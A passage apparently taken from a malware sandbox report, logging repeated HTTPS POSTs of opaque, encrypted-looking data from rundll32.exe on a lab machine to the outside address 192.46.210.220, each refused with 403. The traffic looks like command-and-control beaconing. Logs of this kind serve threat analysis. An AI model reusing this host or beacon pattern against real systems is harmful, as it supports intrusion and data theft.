                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:26 UTC74INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:26 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        15192.168.2.549813192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:29 UTC74OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:29 UTC74OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:30 UTC84INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.549814192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:29 UTC79OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:29 UTC79OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:30 UTC84INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:30 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.549821192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:33 UTC84OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:33 UTC84OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:34 UTC94INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:34 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.549822192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:33 UTC89OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:33 UTC89OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:34 UTC94INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:34 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.549829192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:37 UTC94OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:37 UTC94OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:38 UTC104INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:38 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        2192.168.2.549759192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:01 UTC9OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:01 UTC10OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:02 UTC14INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:02 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        20192.168.2.549830192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:37 UTC99OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:37 UTC99OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:38 UTC104INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:38 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        21192.168.2.549837192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:41 UTC104OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:41 UTC104OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:41 UTC114INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:41 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.549839192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:41 UTC109OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:41 UTC109OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:42 UTC114INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:42 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.549849192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:45 UTC114OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:45 UTC114OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:45 UTC124INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:45 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.549850192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:45 UTC119OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:45 UTC119OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:46 UTC124INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:46 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.549857192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:48 UTC124OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:48 UTC124OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:49 UTC133INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.549858192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:49 UTC129OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:49 UTC129OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:50 UTC134INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.549870192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:52 UTC134OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
